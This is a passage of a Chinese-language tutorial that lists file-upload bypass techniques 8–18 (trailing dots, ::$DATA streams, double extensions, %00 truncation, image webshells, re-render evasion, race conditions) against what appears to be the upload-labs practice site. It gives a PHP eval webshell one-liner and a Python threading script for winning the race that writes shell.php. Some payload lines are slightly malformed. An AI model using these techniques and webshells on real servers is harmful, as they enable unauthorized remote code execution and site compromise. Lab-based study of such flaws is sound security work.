手法8、点(.)号绕过(针对windows系统)
windows系统有个特性,在文件后缀名后加上点(.)号系统会主动把点(.)号去除,利用这个特性可以绕过验证。
使用BP抓取上传1.php的请求包→在1.php后加上点(.)号(1.php)→send→上传成功
手法9、特殊字符绕过(针对windows系统)
windows NT文件系统(NTFS)支持在文件内部创建额外的数据流以存储其他信息,这些额外的数据流可以通过在文件名后面加::$DATA来访问。
使用BP抓取上传1.php的请求包→在1.php后面加上::$DATA→send→上传成功
原理:windows系统下,如果上传文件名为1.php::$DATA,系统会在服务器上生成一个1.php的文件,其中内容和上传的文件内容相同,并被解析。
手法10、路径拼接绕过(针对windows系统)
使用BP抓取上传1.php的请求包→在1.php后加上点空格点(1.php. .)→send→上传成功
手法11、双写绕过
服务器会把黑名单(如php)替换为空,此时双写后缀(如.phpphp)就能绕过
使用BP抓取上传1.php的请求包→将1.php改为1.phpphp→send→上传成功
手法12、空字符截断(%00)
使用BP抓取上传1.php的请求包→将1.php的后缀名改为允许上传的类型(如1.jpg)→在GET请求的url末尾加上a.php%00(目的是使url后面的代码为空失效)→send→上传成功
手法13、字节标识(与手法12不同的是请求方式是POST请求)
使用BP抓取上传1.php的请求包→在路径../upload后加上a.php(../upload/a.php)→选中a.php后面的空格并在inspector的code框里输入00,点击apply changes→修改文件名1.php为1.jpg→send→上传成功
手法14、图片隐写
手法15、生成图片马绕过
创建两个文件1.jpg(正常图片)、1.php(一句话木马)
执行指令:1.jpg/b + 1.php hacker.jpg(图片中插入一句话木马并生成hacker.jpg图片)
上传hacker.jpg
手法16、开启php_exif
手法17、图片二次渲染绕过
上传图片→打开010Editor把上传前的图片和上传后的图片进行对比→找到没有二次渲染的部分在其中写入一句话木马→上传图片马
手法18、条件竞争
方法:一直上传1.php同时一直访问1.php,访问成功的话会在服务器重新写入一个shell.php(一句话木马)的文件
上传1.php(<?php fputs(fopen('shell.php','w'),<?php @eval('$_POST['a']'))?>)
使用BP抓取上传1.php的请求包→发送到intruder→设置payload type为null→start attack→可能会上传成功1.php,,但是会被瞬间瞬间删除,此时需要很快的时间间隙里访问到1.php→访问1.php需要使用python脚本,例如(
import requests
import threading
import os
class RaceCondition(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.url = 'http://192.168.60.143/upload-labs/upload/1.php'
def _get(self):
print('try to call uploaded file...')
r = requests.get(self.url)
if r.status_code == 200:
print(r.text)
os._exit(0)
def run(self):
while True:
for i in range(5):
self._get()
for i in range(10):
self._get()
if __name__ == '__main__':
threads = 50
for i in range(threads):
t = RaceCondition()
t.start()
for i in range(threads):
t.join()
)在pycharm中运行(需和BP攻击同时进行)→访问成功的话服务器中就会被写入一个shell.php的文件